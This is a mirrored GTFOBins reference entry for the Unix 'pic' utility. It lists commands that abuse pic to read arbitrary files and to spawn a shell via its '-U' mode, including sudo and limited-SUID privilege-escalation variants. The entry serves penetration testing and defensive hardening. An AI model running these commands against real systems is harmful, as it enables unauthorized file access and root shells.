1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-16 17:01:38 +02:00
GTFOBins.github.io/_gtfobins/pic.md

24 lines
384 B
Markdown
Raw Permalink Normal View History

2018-11-02 23:45:58 +01:00
---
functions:
file-read:
- description: The output is prefixed with a some content as a header.
code: |
LFILE=file_to_read
pic $LFILE
2018-11-02 23:45:58 +01:00
shell:
- code: |
pic -U
.PS
sh X sh X
sudo:
- code: |
sudo pic -U
.PS
sh X sh X
limited-suid:
- code: |
./pic -U
.PS
sh X sh X
2018-11-02 23:45:58 +01:00
---